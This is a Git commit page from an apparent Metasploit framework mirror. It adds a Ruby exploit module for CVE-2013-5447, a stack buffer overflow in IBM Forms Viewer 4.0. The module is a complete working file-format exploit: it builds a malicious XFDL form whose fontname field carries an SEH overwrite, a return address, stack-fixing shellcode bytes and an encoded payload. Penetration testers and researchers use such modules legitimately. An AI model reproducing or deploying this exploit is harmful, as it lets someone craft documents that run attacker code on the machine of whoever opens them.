infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add module for zdi-13-274

bug/bundler_fix
jvazquez-r7 2013-12-27 10:20:44 -06:00
parent 2ac02d3997
commit ee35f9ac30
1 changed files with 122 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

122
modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb Normal file
View File

@ -0,0 +1,122 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Forms Viewer Unicode Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability
is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed
XFDL files, with a long fontname value. This module has been tested successfully on IBM
Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez', # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-5447' ],
[ 'OSVDB', '100732' ],
[ 'ZDI', '13-274' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21657500' ],
],
'Payload' =>
{
'Space' => 3000,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
'BufferOffset' => 10
},
'BadChars' => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"),
'DisableNops' => true,
# Fix the stack before the payload is executed, so we avoid
# windows exceptions due to alignment
'Prepend' =>
"\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
},
'Platform' => 'win',
'Targets' =>
[
[ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x4c30, # p/p/r unicode from masqform.exe
'Nop' => 0x47, # 004700 => add [edi+0x0],al
'Offset' => 62
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 03 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xfdl']),
], self.class)
end
def exploit
sploit = rand_text_alpha(target['Offset'])
sploit << "\x61\x62" # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
sploit << [target.ret].pack("v") # seh # ppr
sploit << [target['Nop']].pack("C")
sploit << payload.encoded
sploit << rand_text_alpha(4096) # make it crash
xfdl = %Q|<?xml version="1.0" encoding="UTF-8"?>
<XFDL xmlns:custom="http://www.ibm.com/xmlns/prod/XFDL/Custom" xmlns:designer="http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6" xmlns:ev="http://www.w3.org/2001/xml-events" xmlns:xfdl="http://www.ibm.com/xmlns/prod/XFDL/7.5" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns="http://www.ibm.com/xmlns/prod/XFDL/7.5" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<globalpage sid="global">
<global sid="global">
<designer:date>20060615</designer:date>
<formid>
<title></title>
<serialnumber>A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000</serialnumber>
<version>1</version>
</formid>
</global>
</globalpage>
<page sid="PAGE1">
<global sid="global">
<label>PAGE1</label>
</global>
<label sid="TITLE">
<itemlocation>
<x>20</x>
<y>0</y>
</itemlocation>
<value compute="global.global.custom:formTitle">Metasploit</value>
<fontinfo>
<fontname>#{sploit}</fontname>
</fontinfo>
</label>
</page>
</XFDL>
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(xfdl)
end
end